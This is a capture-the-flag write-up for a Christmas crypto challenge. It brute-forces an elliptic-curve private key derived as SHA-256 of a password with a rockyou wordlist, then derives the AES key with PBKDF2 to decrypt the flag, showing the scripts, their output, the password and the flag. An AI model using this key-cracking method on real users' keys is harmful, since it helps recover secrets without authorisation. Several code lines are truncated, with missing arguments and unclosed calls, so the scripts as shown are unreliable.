There’s two types of encryption in this challenge. There’s a elliptic curve, where I have the public key, and I know the private key is the sha256 of password. There’s also this cipher text I’m given that is the flag, encrypted with AES, where the secret is derived from the password and the pbkdf2 hmac algorithm, with a given salt and a large number of iterations, which means it will take a long time (several seconds) to go from the password to the key. So brute focring the password via the AES decryption isn’t feisable.
But I can take a sha256 quickly and check the ECC to see if the public keys match. So I’ll write some Python to do that, and print the password:
#!/usr/bin/env python3
import hashlib
from Crypto.PublicKey import ECC
pub = ECC.construct(
with open("rockyou16.txt", "r") as f:
passwords = map(str.strip, f.readlines())
for password in passwords:
d = int(hashlib.sha256(password.encode()).hexdigest(), 16)
priv = ECC.construct(curve="p256", d=d)
if priv.public_key() == pub:
print(f"Found Santa's password: {password}")
When I run this, it finds the password in less than 10 seconds (in a relatively underpowered VM):
$ time python3 21.py
Found Santa's password: santacomesatxmas
real 0m9.601s
user 0m9.411s
sys 0m0.063s
Now, I’ll use that password to calculate the key material for the AES, and then decrypt:
#!/usr/bin/env python3
import hashlib
from base64 import b64decode
from Crypto.PublicKey import ECC
from Crypto.Cipher import AES
pub = ECC.construct(
with open("rockyou16.txt", "r") as f:
passwords = map(str.strip, f.readlines())
for password in passwords:
d = int(hashlib.sha256(password.encode()).hexdigest(), 16)
priv = ECC.construct(curve="p256", d=d)
if priv.public_key() == pub:
print(f"Found Santa's password: {password}")
dk = hashlib.pbkdf2_hmac(
"sha256", password.encode(), b"TwoHundredFiftySix", 256 * 256 * 256
aes = AES.new(dk, AES.MODE_ECB)
flag = aes.decrypt(b64decode("Hy97Xwv97vpwGn21finVvZj5pK/BvBjscf6vffm1po0=")).decode()
print(f"flag: {flag}")
This time, it prints the flag after about 30 seconds:
$ time python3 21.py
Found Santa's password: santacomesatxmas
flag: HV19{sry_n0_crypt0mat_th1s_year}
real 0m31.763s
user 0m31.538s
sys 0m0.080s
Flag: HV19{sry_n0_crypt0mat_th1s_year}